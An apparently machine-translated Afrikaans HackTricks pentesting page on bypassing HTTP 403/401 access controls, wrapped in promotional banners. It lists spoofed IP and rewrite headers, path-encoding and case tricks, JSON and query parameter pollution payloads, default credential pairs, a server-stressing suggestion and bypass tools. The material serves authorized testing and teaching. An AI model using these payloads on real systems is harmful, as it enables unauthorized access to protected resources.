9.1 KiB
403 & 401 Oorsprong
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai Kyk na die INSKRYWINGSPLANNE!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek Die PEASS Familie, ons versameling van eksklusiewe NFTs
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou haktruuks deur PRs in te dien by die HackTricks en HackTricks Cloud github-opslag.
Onmiddellik beskikbare opstelling vir kwesbaarheidsassessering & penetrasietoetsing. Voer 'n volledige pentest uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporing & uitbuitingsmodules om hulle 'n bietjie tyd terug te gee om dieper te graaf, skulpe te laat pop en pret te hê.
{% embed url="https://pentest-tools.com/" %}
HTTP Werkwoorde/Metodes Fuzzing
Probeer om verskillende werkwoorde te gebruik om die lêer te benader: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK
- Kontroleer die responskoppe, dalk kan daar enige inligting gegee word. Byvoorbeeld, 'n 200 respons op HEAD met
Content-Length: 55
beteken dat die HEAD-werkwoord die inligting kan benader. Maar jy moet steeds 'n manier vind om daardie inligting uit te voer. - Die gebruik van 'n HTTP-kop soos
X-HTTP-Method-Override: PUT
kan die gebruikte werkwoord oorskryf. - Gebruik die
TRACE
werkwoord en as jy baie gelukkig is, kan jy dalk ook die koppe sien wat deur tussenliggende proksi's bygevoeg is wat nuttig kan wees.
HTTP Koppe Fuzzing
-
Verander die Host-kop na 'n willekeurige waarde (wat hier gewerk het)
-
Probeer om ander Gebruikeragents te gebruik om die hulpbron te benader.
-
Fuzz HTTP Koppe: Probeer om HTTP Proksi Koppe, HTTP-outentifikasie Basies en NTLM-bruteforse (met net 'n paar kombinasies) en ander tegnieke te gebruik. Om dit alles te doen, het ek die gereedskap fuzzhttpbypass geskep.
-
X-Originating-IP: 127.0.0.1
-
X-Forwarded-For: 127.0.0.1
-
X-Forwarded: 127.0.0.1
-
Forwarded-For: 127.0.0.1
-
X-Remote-IP: 127.0.0.1
-
X-Remote-Addr: 127.0.0.1
-
X-ProxyUser-Ip: 127.0.0.1
-
X-Original-URL: 127.0.0.1
-
Client-IP: 127.0.0.1
-
True-Client-IP: 127.0.0.1
-
Cluster-Client-IP: 127.0.0.1
-
X-ProxyUser-Ip: 127.0.0.1
-
Host: localhost
As die pad beskerm is, kan jy probeer om die padbeskerming te omseil deur hierdie ander koppe te gebruik:
X-Original-URL: /admin/console
X-Rewrite-URL: /admin/console
- As die bladsy agter 'n proksi is, is dit miskien die proksi wat jou verhoed om die privaat inligting te benader. Probeer om HTTP-versoeksmokkelary te misbruik of hop-by-hop koppe.
- Fuzz spesiale HTTP-koppe op soek na 'n verskillende respons.
- Fuzz spesiale HTTP-koppe terwyl jy HTTP Metodes fuzz.
- Verwyder die Host-kop en miskien sal jy die beskerming kan omseil.
Pad Fuzzing
As /pad geblokkeer is:
- Probeer om /%2e/path _(as die toegang deur 'n proksi geblokkeer word, kan dit die beskerming omseil). Probeer ook_** /%252e**/path (dubbele URL-kodering)
- Probeer Unicode-omseiling: /%ef%bc%8fpath (Die URL-gekodeerde karakters is soos "/") sodat wanneer dit teruggekodeer word, sal dit //path wees en miskien het jy reeds die /pad naamkontrole omseil
- Ander padomseilings:
- site.com/secret –> HTTP 403 Verbode
- site.com/SECRET –> HTTP 200 OK
- site.com/secret/ –> HTTP 200 OK
- site.com/secret/. –> HTTP 200 OK
- site.com//secret// –> HTTP 200 OK
- site.com/./secret/.. –> HTTP 200 OK
- site.com/;/secret –> HTTP 200 OK
- site.com/.;/secret –> HTTP 200 OK
- site.com//;//secret –> HTTP 200 OK
- site.com/secret.json –> HTTP 200 OK (ruby)
- Gebruik al hierdie lys in die volgende situasies:
- /FUZZsecret
- /FUZZ/secret
- /secretFUZZ
- Ander API-omseilings:
- /v3/users_data/1234 --> 403 Verbode
- /v1/users_data/1234 --> 200 OK
- {“id”:111} --> 401 Ongeoutoriseer
- {“id”:[111]} --> 200 OK
- {“id”:111} --> 401 Ongeoutoriseer
- {“id”:{“id”:111}} --> 200 OK
- {"user_id":"<legit_id>","user_id":"<victims_id>"} (JSON Parameterbesoedeling)
- user_id=ATTACKER_ID&user_id=VICTIM_ID (Parameterbesoedeling)
Parameter Manipulation
- Verander param-waarde: Van
id=123
-->id=124
- Voeg addisionele parameters by die URL:
?
id=124
—->id=124&isAdmin=true
- Verwyder die parameters
- Herorden parameters
- Gebruik spesiale karakters.
- Voer grenstoetsing in die parameters uit - voorsien waardes soos -234 of 0 of 99999999 (net 'n paar voorbeeldwaardes).
Protokolweergawe
Indien HTTP/1.1 gebruik word, probeer om 1.0 te gebruik of selfs toets of dit 2.0 ondersteun.
Ander Oorspronge
- Kry die IP of CNAME van die domein en probeer om direk daarmee kontak te maak.
- Probeer om die bediener te stres deur algemene GET-versoeke te stuur (Dit het vir hierdie persoon met Facebook gewerk).
- Verander die protokol: van http na https, of van https na http
- Gaan na https://archive.org/web/ en kyk of daardie lêer in die verlede wêreldwyd toeganklik was.
Brute Force
- Raai die wagwoord: Toets die volgende algemene geloofsbriewe. Weet jy iets van die slagoffer? Of die CTF-uitdaging se naam?
- Brute force: Probeer basiese, digest en NTLM-outentifikasie.
{% code title="Gewone geloofsbriewe" %}
admin admin
admin password
admin 1234
admin admin1234
admin 123456
root toor
test test
guest guest
{% endcode %}
Outomatiese Gereedskap
- https://github.com/lobuhi/byp4xx
- https://github.com/iamj0ker/bypass-403
- https://github.com/gotr00t0day/forbiddenpass
- Burp-uitbreiding - 403 Bypasser
- Verbode Buster
Onmiddellik beskikbare opstelling vir kwesbaarheidsassessering en penetrasietoetsing. Voer 'n volledige pentest uit vanaf enige plek met 20+ gereedskap en funksies wat strek vanaf rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te delf, skulpe te laat spat, en pret te hê.
{% embed url="https://pentest-tools.com/" %}
Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy wil sien dat jou maatskappy geadverteer word in HackTricks of HackTricks aflaai in PDF-formaat Kontroleer die INSKRYWINGSPLANNE!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek Die PEASS-familie, ons versameling van eksklusiewe NFT's
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou haktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.